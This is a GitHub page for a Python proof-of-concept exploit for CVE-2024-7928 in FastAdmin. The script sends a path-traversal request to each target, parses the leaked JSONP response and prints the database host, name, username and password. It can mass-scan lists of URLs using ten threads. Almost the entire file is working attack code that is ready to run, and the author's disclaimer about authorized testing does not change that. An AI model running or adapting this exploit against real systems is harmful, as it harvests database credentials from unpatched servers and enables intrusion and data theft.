-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathCVE-2024-7928.py
165 lines (133 loc) · 6.2 KB
/
CVE-2024-7928.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
"""
CVE-2024-7928
This POC will attempt to retrieve DB details for FastAdmin instances.
Usage:
single target:CVE-2024-7928.py -u https://target:9090
bulk targets:CVE-2024-7928.py -f file.txt
Tool Author: x.com/MohamedNab1l
GitHub: https://github.com/bigb0x/CVE-2024-7928
Credit:
This automated tool is based on this security research: https://wiki.shikangsi.com/post/share/da0292b8-0f92-4e6e-bdb7-73f47b901acd
Disclaimer:
I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.
"""
import requests
import argparse
import threading
import queue
import os
from requests.exceptions import RequestException
from datetime import datetime
import urllib3
import signal
import sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
the_version = "1.0.1"
dimmed_gray_color = '\033[90m'
honey_yellow_color = "\033[38;5;214m"
dim_yellow_color = '\033[33;1m'
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
light_orange_color = '\033[38;5;214m'
reset_color = '\033[0m'
def banner():
print(f"""
{light_orange_color}
░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ ─█▀█─ ── ▀▀▀█ ▄▀▀▄ █▀█ ▄▀▀▄
░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ █▄▄█▄ ▀▀ ──█─ ▀▄▄█ ─▄▀ ▄▀▀▄
░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ ───█─ ── ─▐▌─ ─▄▄▀ █▄▄ ▀▄▄▀
{reset_color}-> POC for FastAdmin CVE-2024-7928. Will attempt to retrieve DB details.{reset_color}
{reset_color}{dimmed_gray_color}-> By x.com/MohamedNab1l
{light_orange_color}-> Use Wisely.{reset_color}
""")
LOG_DIR = 'logs'
LOG_FILE = os.path.join(LOG_DIR, 'scan.log')
def create_log_dir():
if not os.path.exists(LOG_DIR):
os.makedirs(LOG_DIR)
print_message('info', f"Log directory created: {LOG_DIR}")
def log_message(message):
with open(LOG_FILE, 'a') as log_file:
log_file.write(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')} - {message}\n")
def print_message(level, message):
if level == 'vulnerable':
print(f"{light_orange_color}[VLUN] {message}{reset_color}")
if level == 'info':
print(f"{dimmed_gray_color}[INFO] {message}{reset_color}")
elif level == 'warning':
print(f"{cyan_color}[INFO] {message}{reset_color}")
elif level == 'error':
print(f"{red_color}[ERROR] {message}{reset_color}")
log_message(message)
paths_to_check = "/index/ajax/lang?lang=../../application/database"
def make_request(url):
try:
response = requests.get(url, verify=False)
if response.status_code == 200:
return response.text
else:
return None
except requests.RequestException as e:
return None
import json
def test_host(url):
try:
fullurl = f"{url}{paths_to_check}"
body = make_request(fullurl)
if body is not None and 'jsonpReturn(' in body:
print_message('vulnerable', f"{url}")
print_message('vulnerable', f"Retrieving DB details for: {url}")
json_str = body.split('jsonpReturn(')[1].split(');')[0]
data = json.loads(json_str)
print(f"{dimmed_gray_color}DB-Type: {light_orange_color}{data.get('type', 'N/A')}{reset_color}")
print(f"{dimmed_gray_color}Hostname: {light_orange_color}{data.get('hostname', 'N/A')}{reset_color}")
print(f"{dimmed_gray_color}Database: {light_orange_color}{data.get('database', 'N/A')}{reset_color}")
print(f"{dimmed_gray_color}Username: {light_orange_color}{data.get('username', 'N/A')}{reset_color}")
print(f"{dimmed_gray_color}Password: {light_orange_color}{data.get('password', 'N/A')}{reset_color}")
print(f"{dimmed_gray_color}hostport: {light_orange_color}{data.get('hostport', 'N/A')}{reset_color}")
# print()
else:
print_message('warning', f"Not Vulnerable: {url}")
except requests.RequestException as e:
print_message('error', f"Timeout: {url}")
except json.JSONDecodeError:
print_message('error', f"Failed to parse JSON response from: {url}")
def worker(queue):
while not queue.empty():
url = queue.get()
print_message('info', f"Testing {url}")
test_host(url)
queue.task_done()
def signal_handler(sig, frame):
print_message('error', 'You pressed Ctrl+C! Exiting.')
sys.exit(0)
def main():
signal.signal(signal.SIGINT, signal_handler)
banner()
parser = argparse.ArgumentParser(description='POC for FastAdmin CVE-2024-7928. Will attempt to retrieve DB details.')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com:8080)')
group.add_argument('-f', '--file', help='File containing list of URLs (one per line)')
args = parser.parse_args()
create_log_dir()
if args.url:
print_message('info', f"Testing single target: {args.url}")
test_host(args.url)
elif args.file:
with open(args.file, 'r') as f:
urls = [line.strip() for line in f if line.strip()]
print_message('info', f"Testing multiple targets from file: {args.file}")
url_queue = queue.Queue()
for url in urls:
url_queue.put(url)
threads = []
for _ in range(10):
t = threading.Thread(target=worker, args=(url_queue,))
t.start()
threads.append(t)
for t in threads:
t.join()
print_message('info', "Scanning complete.")
if __name__ == '__main__':
main()